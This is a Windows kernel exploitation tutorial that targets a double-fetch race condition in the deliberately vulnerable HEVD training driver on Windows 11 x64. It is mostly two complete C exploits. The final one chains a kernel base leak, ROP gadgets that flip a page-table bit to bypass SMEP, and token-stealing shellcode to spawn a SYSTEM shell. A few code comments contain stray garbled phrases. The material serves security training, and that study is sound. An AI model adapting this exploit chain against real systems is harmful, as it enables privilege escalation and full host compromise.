0x08 - Modern Windows Kernel Race Conditions
With Windows 7 (x86) conquered we can proceed to attempt exploitation in Windows 11 (x64).
Let’s jump in.
Table of Contents
Reverse Engineering
Let’s take a look at the vulnerable handler as well as respective structures used by the handler function.
Next, let’s look at TriggerDoubleFetch()
where the Double Fetch vulnerability is located.
We can see that our controlled input is referenced two different times just as before which means we should be able to trigger the race condition in the same manor as before, more specifically the double fetch! Let’s bust out a PoC!
PoC
With all that information (plus our experience in Windows 7) we can go ahead and craft a PoC.
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <windows.h>
#include <psapi.h>
#include <ntdef.h>
#include <winternl.h>
#include <shlwapi.h>
#include <processthreadsapi.h>
/* IOCTL */
#define DOUBLE_FETCH_IOCTL 0x222037
/* Max threads */
#define NUM_THREADS 5
/* Exploit Buffer */
#define BUFFER 0x1000
/* Structure used by Double Fetch */
typedef struct _DOUBLE_FETCH
{
void * Buffer;
uint64_t Size;
} DOUBLE_FETCH, *PDOUBLE_FETCH;
/* Structure for threads */
typedef struct _IRP_ARGS
{
HANDLE hHEVD;
PDOUBLE_FETCH pDoubleFetch;
} IRP_ARGS, *PIRP_ARGS;
/* CheckWin():
Simple function to check if we're running as SYSTEM */
int CheckWin(VOID)
{
DWORD win = 0;
DWORD dwLen = 0;
CHAR *cUsername = NULL;
GetUserNameA(NULL, &dwLen);
if (dwLen > 0) {
cUsername = (CHAR *)malloc(dwLen * sizeof(CHAR));
} else {
printf("[-] Failed to allocate buffer for username check\n");
return -1;
}
GetUserNameA(cUsername, &dwLen);
win = strcmp(cUsername, "SYSTEM");
free(cUsername);
return (win == 0) ? win : -1;
}
/* TriggerRaceCondition():
Since driver reads from userland twice we can overwrite the existing condition that bypasses the checkslmgr -rearm
at runtime. If we win the race we successfully trigger a buffer overflow! */
DWORD WINAPI TriggerRaceCondition(LPVOID lpParameters)
{
PIRP_ARGS pIrpArgs = (PIRP_ARGS)lpParameters;
while (1) {
pIrpArgs->pDoubleFetch->Size = BUFFER;
}
return 0;
}
/* TriggerWorkingCondition():
As we saw in TriggerDoubleFetch() in order to reach the RtlCopyMemory() aka wrapper for memcpy() we need
our buffer to be under the sizeof(KernelBuffer). This function sends an IOCTL to ensure we meed that
condition. */
DWORD WINAPI TriggerWorkingCondition(LPVOID lpParameters)
{
DWORD dwBytesReturned = 0;
PIRP_ARGS pIrpArgs = (PIRP_ARGS)lpParameters;
printf("\t[*] Spraying DoubleFetchObject(s): %p, Size: 0x%x\n", pIrpArgs->pDoubleFetch,
pIrpArgs->pDoubleFetch->Size);
while (1)
{
pIrpArgs->pDoubleFetch->Size = 0x10;
DeviceIoControl(pIrpArgs->hHEVD,
DOUBLE_FETCH_IOCTL,
pIrpArgs->pDoubleFetch,
sizeof(DOUBLE_FETCH),
NULL,
0x00,
&dwBytesReturned,
NULL);
}
return 0;
}
/* GenerateExploitBuffer():
Generate the buffer that will overwrite the return address and grant control over the instruction pointer. */
void GenerateExploitBuffer(LPVOID lpvBuffer)
{
uint64_t *payload = (uint64_t *)(lpvBuffer);
for (int i = 0; i < (BUFFER / sizeof(uint64_t)); i++)
{
*payload++ = 0x4141414141414141;
}
}
/* Exploit():
Double Fetch */
int Exploit(HANDLE hHEVD)
{
LPVOID lpvMemoryAllocation = NULL;
HANDLE hThreadWork[NUM_THREADS] = { 0 };
HANDLE hThreadRace[NUM_THREADS] = { 0 };
PIRP_ARGS pIrpArgs = (PIRP_ARGS)malloc(sizeof(IRP_ARGS));
PDOUBLE_FETCH pDoubleFetchObject = (PDOUBLE_FETCH)malloc(sizeof(DOUBLE_FETCH));
lpvMemoryAllocation = VirtualAlloc(NULL,
BUFFER,
(MEM_COMMIT | MEM_RESERVE),
PAGE_EXECUTE_READWRITE);
if (lpvMemoryAllocation == NULL)
{
printf("[-] Failed to allocate exploitation buffer\n");
return -1;
}
printf("[*] Successfully allocated exploitation buffer\n");
/* Fill up the buffer */
GenerateExploitBuffer(lpvMemoryAllocation);
/* Setup the Double Fetch object */
pDoubleFetchObject->Buffer = lpvMemoryAllocation;
pDoubleFetchObject->Size = 0;
/* Setup the base IRP argument(s) */
pIrpArgs->hHEVD = hHEVD;
pIrpArgs->pDoubleFetch = pDoubleFetchObject;
/* Start the race!! */
printf("[*] Off to the races\n");
for (int i = 0; i < NUM_THREADS; i++)
{
hThreadWork[i] = CreateThread(NULL, 0, TriggerWorkingCondition, pIrpArgs, 0, NULL);
hThreadRace[i] = CreateThread(NULL, 0, TriggerRaceCondition, pIrpArgs, 0, NULL);
}
WaitForMultipleObjects(NUM_THREADS, hThreadWork, TRUE, 10000);
for (int i = 0; i < NUM_THREADS; i++)
{
TerminateThread(hThreadWork[i], 0);
CloseHandle(hThreadWork[i]);
TerminateThread(hThreadRace[i], 0);
CloseHandle(hThreadRace[i]);
}
return CheckWin();
}
int main()
{
HANDLE hHEVD = NULL;
hHEVD = CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver",
(GENERIC_READ | GENERIC_WRITE),
0x00,
NULL,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL,
NULL);
if (hHEVD == NULL)
{
printf("[-] Failed to get a handle on HackSysExtremeVulnerableDriver\n");
return -1;
}
if (Exploit(hHEVD) == 0) {
printf("[*] Exploitation successful, enjoy de shell!!\n\n");
system("cmd.exe");
} else {
printf("[-] Exploitation failed, run again\n");
}
if (hHEVD != INVALID_HANDLE_VALUE) {
CloseHandle(hHEVD);
}
}
Once sent, we can see we’ve overwritten a return address and have obtained control over the instruction pointer :)
Getting Code Execution
We more than likely have more than enough room before the buffer overflow to inject a ROP chain to bypass memory protections. After seeing that the overwrite occured at 2064 bytes we can proceed to look for gadgets.
C:\>rp-win.exe --rop=100 --va=0 --file C:\Windows\System32\ntoskrnl.exe > rop.txt
Don’t forget to convert to ascii if needed ;)
$ iconv -f utf-16 -t us-ascii//TRANSLIT rop.txt > rop_ascii.txt
Sadly after looking at our options we don’t see alot of sub rsp
gadgets and even if we managed to find one.. it looks like the buffer we wrote is contaminated with additional data we did not send.
So if we can’t jump back let’s jump forward! Since we can write “as much as we wan’t, let’s write our ROP chain past the return address overwrite!
Exploitation
Below is the final PoC code:
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <windows.h>
#include <psapi.h>
#include <ntdef.h>
#include <winternl.h>
#include <shlwapi.h>
#include <processthreadsapi.h>
/* IOCTL */
#define DOUBLE_FETCH_IOCTL 0x222037
/* Max threads */
#define NUM_THREADS 5 // 10
/* Exploit Buffer */
#define BUFFER 0x900
#define RETOVR 2064
/* Structure used by Double Fetch */
typedef struct _DOUBLE_FETCH
{
void * Buffer;
uint64_t Size;
} DOUBLE_FETCH, *PDOUBLE_FETCH;
/* Structure for threads */
typedef struct _IRP_ARGS
{
HANDLE hHEVD;
PDOUBLE_FETCH pDoubleFetch;
} IRP_ARGS, *PIRP_ARGS;
/* GetKernelModuleBase():
Function used to obtain kernel module address */
LPVOID GetKernelModuleBase(PCHAR pKernelModule)
{
char pcDriver[1024] = { 0 };
LPVOID lpvTargetDriver = NULL;
LPVOID *lpvDrivers = NULL;
DWORD dwCB = 0;
DWORD dwDrivers = 0;
DWORD i = 0;
EnumDeviceDrivers(NULL, dwCB, &dwCB);
if (dwCB <= 0)
return NULL;
lpvDrivers = (LPVOID *)malloc(dwCB * sizeof(LPVOID));
if (lpvDrivers == NULL)
return NULL;
if (EnumDeviceDrivers(lpvDrivers, dwCB, &dwCB))
{
dwDrivers = dwCB / sizeof(LPVOID);
for (i = 0; i < dwDrivers; i++)
if (GetDeviceDriverBaseNameA(lpvDrivers[i], pcDriver, sizeof(pcDriver)))
if (StrStrA(pcDriver, pKernelModule) != NULL)
lpvTargetDriver = lpvDrivers[i];
}
free(lpvDrivers);
return lpvTargetDriver;
}
/* CheckWin():
Simple function to check if we're running as SYSTEM */
int CheckWin(VOID)
{
DWORD win = 0;
DWORD dwLen = 0;
CHAR *cUsername = NULL;
GetUserNameA(NULL, &dwLen);
if (dwLen > 0) {
cUsername = (CHAR *)malloc(dwLen * sizeof(CHAR));
} else {
printf("[-] Failed to allocate buffer for username check\n");
return -1;
}
GetUserNameA(cUsername, &dwLen);
win = strcmp(cUsername, "SYSTEM");
free(cUsername);
return (win == 0) ? win : -1;
}
/* TriggerRaceCondition():
Since driver reads from userland twice we can overwrite the existing condition that bypasses the checkslmgr -rearm
at runtime. If we win the race we successfully trigger a buffer overflow! */
DWORD WINAPI TriggerRaceCondition(LPVOID lpParameters)
{
PIRP_ARGS pIrpArgs = (PIRP_ARGS)lpParameters;
while (1) {
pIrpArgs->pDoubleFetch->Size = BUFFER;
}
return 0;
}
/* TriggerWorkingCondition():
As we saw in TriggerDoubleFetch() in order to reach the RtlCopyMemory() aka wrapper for memcpy() we need
our buffer to be under the sizeof(KernelBuffer). This function sends an IOCTL to ensure we meed that
condition. */
DWORD WINAPI TriggerWorkingCondition(LPVOID lpParameters)
{
DWORD dwBytesReturned = 0;
PIRP_ARGS pIrpArgs = (PIRP_ARGS)lpParameters;
printf("\t[!] Racing!!! Spraying Object(s): %p, Size: 0x%x\n", pIrpArgs->pDoubleFetch,
pIrpArgs->pDoubleFetch->Size);
while (1)
{
pIrpArgs->pDoubleFetch->Size = 0x10;
DeviceIoControl(pIrpArgs->hHEVD,
DOUBLE_FETCH_IOCTL,
pIrpArgs->pDoubleFetch,
sizeof(DOUBLE_FETCH),
NULL,
0x00,
&dwBytesReturned,
NULL);
}
return 0;
}
/* GenerateExploitBuffer():
Generate the buffer that will overwrite the return address and grant control over the instruction pointer. */
DWORD GenerateExploitBuffer(LPVOID lpvNt, LPVOID lpvBuffer)
{
DWORD i = 0;
LPVOID lpvShellcode = NULL;
uint64_t nt = (uint64_t)(lpvNt);
uint64_t *payload = (uint64_t *)(lpvBuffer);
uint8_t sc[129] = {
// sickle-tool -p windows/x64/kernel_token_stealer -f num (58 bytes)
0x65, 0x48, 0xa1, 0x88, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80,
0xb8, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xb2, 0x04, 0x48, 0x8b, 0x80, 0x48, 0x04,
0x00, 0x00, 0x48, 0x2d, 0x48, 0x04, 0x00, 0x00, 0x38, 0x90, 0x40, 0x04, 0x00, 0x00,
0x75, 0xeb, 0x48, 0x8b, 0x90, 0xb8, 0x04, 0x00, 0x00, 0x48, 0x89, 0x91, 0xb8, 0x04,
0x00, 0x00,
// sickle-tool -p windows/x64/kernel_sysret -f num (71)
0x65, 0x48, 0xa1, 0x88, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x66, 0x8b, 0x88,
0xe4, 0x01, 0x00, 0x00, 0x66, 0xff, 0xc1, 0x66, 0x89, 0x88, 0xe4, 0x01, 0x00, 0x00,
0x48, 0x8b, 0x90, 0x90, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x8a, 0x68, 0x01, 0x00, 0x00,
0x4c, 0x8b, 0x9a, 0x78, 0x01, 0x00, 0x00, 0x48, 0x8b, 0xa2, 0x80, 0x01, 0x00, 0x00,
0x48, 0x8b, 0xaa, 0x58, 0x01, 0x00, 0x00, 0x31, 0xc0, 0x0f, 0x01, 0xf8, 0x48, 0x0f,
0x07 };
lpvShellcode = VirtualAlloc(NULL, 129, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (lpvShellcode == NULL)
{
printf("[-] Failed to allocate memory to house shellcode\n");
return -1;
}
RtlCopyMemory(lpvShellcode, sc, 129);
for (i = 0; i < (RETOVR / sizeof(uint64_t)); i++) {
*payload++ = nt + 0xa4ea7d; // ret
}
/* Prepare RDX register for later. This is needed for the XOR operation */
*payload++ = nt + 0x40ed4e; // pop rdx ; pop rax ; pop rcx ; ret
*payload++ = 0x000008; // Set RDX to 0x08, we will need this to accomplish the XOR
*payload++ = 0x000000; // [filler]
*payload++ = 0x000000; // [filler]
/* Setup the call to MiGetPteAddress in order to get the address of the PTE for our
userland code. The setup is as follows:
RAX -> VOID *MiGetPteAddress(
( RCX == PTE / Userland Code )
);
Once the call is complete RAX should contain the pointer to our PTE. */
*payload++ = nt + 0x57699c; // pop rcx ; ret
*payload++ = (uint64_t)lpvShellcode; // *shellcode
*payload++ = nt + 0x24aaec; // MiGetPteAddress()
/* Now that we have obtained the PTE address, we can modify the 2nd bit in order to
mark the page as a kernel page (U -> K). We can do this using XOR ;) */
*payload++ = nt + 0x30fcf3; // sub rax, rdx ; ret
*payload++ = nt + 0x54f344; // push rax ; pop rbx ; ret
*payload++ = nt + 0x40ed4e; // pop rdx ; pop rax ; pop rcx ; ret
*payload++ = 0x000004; // 0x40ed4e: pop rdx ; pop rax ; pop rcx ; ret ; (1 found)
*payload++ = 0x000000; // [filler]
*payload++ = 0x000000; // [filler]
*payload++ = nt + 0x3788b6; // xor [rbx+0x08], edx ; mov rbx, qword [rsp+0x60] ; add rsp, 0x40 ; pop r14 ; pop rdi ; pop rbp ; ret
/* Now we cam spray our shellcode address since SMEP and VPS should be bypassed */
for (i = 0; i < 0xC; i++) {
*payload++ = (uint64_t)lpvShellcode;
}
}
/* Exploit():
Double Fetch */
int Exploit(HANDLE hHEVD)
{
LPVOID lpvNtKrnl = NULL;
LPVOID lpvMemoryAllocation = NULL;
HANDLE hThreadWork[NUM_THREADS] = { 0 };
HANDLE hThreadRace[NUM_THREADS] = { 0 };
PIRP_ARGS pIrpArgs = (PIRP_ARGS)malloc(sizeof(IRP_ARGS));
PDOUBLE_FETCH pDoubleFetchObject = (PDOUBLE_FETCH)malloc(sizeof(DOUBLE_FETCH));
lpvMemoryAllocation = VirtualAlloc(NULL,
BUFFER,
(MEM_COMMIT | MEM_RESERVE),
PAGE_EXECUTE_READWRITE);
if (lpvMemoryAllocation == NULL)
{
printf("[-] Failed to allocate exploitation buffer\n");
return -1;
}
printf("[*] Successfully allocated exploitation buffer\n");
/* You already know ;) */
lpvNtKrnl = GetKernelModuleBase("ntoskrnl");
if (lpvNtKrnl == NULL)
{
printf("[-] Failed to obtain the base address of nt\n");
return -1;
}
printf("[*] Obtained the base address of nt: 0x%p\n", lpvNtKrnl);
/* Fill up the buffer */
GenerateExploitBuffer(lpvNtKrnl, lpvMemoryAllocation);
/* Setup the Double Fetch object */
pDoubleFetchObject->Buffer = lpvMemoryAllocation;
pDoubleFetchObject->Size = 0;
/* Setup the base IRP argument(s) */
pIrpArgs->hHEVD = hHEVD;
pIrpArgs->pDoubleFetch = pDoubleFetchObject;
/* Start the race!! */
printf("[*] Viol, Opr, Conspiracy Origins\n");
for (int i = 0; i < NUM_THREADS; i++)
{
hThreadWork[i] = CreateThread(NULL, 0, TriggerWorkingCondition, pIrpArgs, 0, NULL);
hThreadRace[i] = CreateThread(NULL, 0, TriggerRaceCondition, pIrpArgs, 0, NULL);
}
WaitForMultipleObjects(NUM_THREADS, hThreadWork, TRUE, 10000);
for (int i = 0; i < NUM_THREADS; i++)
{
TerminateThread(hThreadWork[i], 0);
CloseHandle(hThreadWork[i]);
TerminateThread(hThreadRace[i], 0);
CloseHandle(hThreadRace[i]);
}
return CheckWin();
}
int main()
{
HANDLE hHEVD = NULL;
hHEVD = CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver",
(GENERIC_READ | GENERIC_WRITE),
0x00,
NULL,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL,
NULL);
if (hHEVD == NULL)
{
printf("[-] Failed to get a handle on HackSysExtremeVulnerableDriver\n");
return -1;
}
if (Exploit(hHEVD) == 0) {
printf("[*] We won the race!!! Enjoy de shell!!\n\n");
system("cmd.exe");
} else {
printf("[-] Exploitation failed, run again\n");
}
if (hHEVD != INVALID_HANDLE_VALUE) {
CloseHandle(hHEVD);
}
}
Once sent, we have code execution: